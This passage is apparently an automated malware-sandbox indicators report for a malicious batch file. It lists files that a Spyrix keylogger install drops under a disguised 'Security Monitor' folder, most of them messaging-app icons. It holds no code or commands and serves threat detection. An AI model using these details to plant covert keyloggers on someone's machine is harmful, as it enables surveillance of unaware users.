IOC Report
D0WmCTD2qO.bat

loading gif

Files

File Path
Type
Category
Malicious
D0WmCTD2qO.bat
ASCII text, with CRLF line terminators
initial sample
malicious
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe (copy)
PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
dropped
malicious
C:\ProgramData\Spyrix Free Keylogger\temp\reg\info.uid
Windows Registry little-endian text (Win2K or above)
dropped
malicious
C:\Users\user\AppData\Local\Temp\c8f0ad90-24c5-4e6e-bb8b-4ca36210d878\[space]= .exe
PE32 executable (GUI) Intel 80386, for MS Windows
modified
malicious
C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\ProgramData\Microsoft\Network\Downloader\edb.log
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage engine DataBase, version 0x620, checksum 0x7b1c7063, page size 16384, DirtyShutdown, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
data
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\WebBrowser.dll (copy)
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\cfg.cmd (copy)
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\dashboard.cmd (copy)
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\dashboard.url (copy)
MS Windows 95 Internet shortcut text (URL=<"https://dashboard.spyrix.com">), ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Discord.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Discord.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Facebook Messenger.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Facebook Messenger.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Line.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Line.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Mail Agent.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Mail Agent.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Messenger.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Messenger.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Microsoft Teams.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Microsoft Teams.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Mozilla Thunderbird.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Mozilla Thunderbird.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Opera Mail.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Opera Mail.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Telegram.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Telegram.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Tencent QQ.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Tencent QQ.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Viber.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Viber.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\WhatsApp.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\WhatsApp.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Zoom.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Zoom.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\aim.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\aim.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\google talk.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\google talk.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\icq.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\icq.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-4FIMA.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-54IQ1.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-6M4L4.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-71RG7.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-7BSH8.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-7TR0J.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-83T5E.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-8H67S.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-8SR9P.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-90D3G.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-9IG5O.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-B7IP4.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-BCRFE.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-CNDLQ.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-CPSH6.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-D1RJC.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-EBTAV.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-ENTLF.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-FF5AQ.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-FH6KB.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-HML4Q.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-IH34D.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-JBP8C.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-JFM1S.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-K3IR9.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-KOLJL.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-L2SUC.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-LBHSB.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-LCPD4.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-NAPE1.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-NRBR0.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-NRRJB.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-Q2QLR.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-QCQRK.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-R1S26.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-S4354.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-SDUR6.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-SUHLM.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-TFKN8.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-TLFJN.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-UBVGD.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-V1P7E.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-V390T.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-VMNQ3.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-VMP9K.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-VVBTQ.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\none.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\none.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\qip.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\qip.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\skype.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\skype.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\slack.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\slack.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\trillian.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\trillian.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\windows live messenger.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\windows live messenger.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\yahoo! messenger.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\yahoo! messenger.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Discord.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Facebook Messenger.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Google Talk.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Line.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Mail Agent.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Messenger.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Microsoft Teams.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Mozilla Thunderbird.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Opera Mail.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Telegram.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Tencent QQ.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Viber.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\WhatsApp.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Windows Live Messenger.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Yahoo! Messenger.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Zoom.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\aim.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\icq.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-0DCNF.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-25RT0.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-2D77M.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-4GP22.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-4OBL8.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-5H5M1.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-8Q4PG.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-8UNNB.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-BN700.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-C9MB7.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-EJLK2.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-I5U00.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-J0B7Q.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-KACC0.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-MEBT7.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-MGKCG.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-OFJQK.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-OMO2M.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-PEDA6.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-PH1G5.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-Q4NET.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-UH1T8.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-UH2FQ.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-VLETQ.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\mail.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\none.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\qip.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\skype.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\slack.ico (copy)
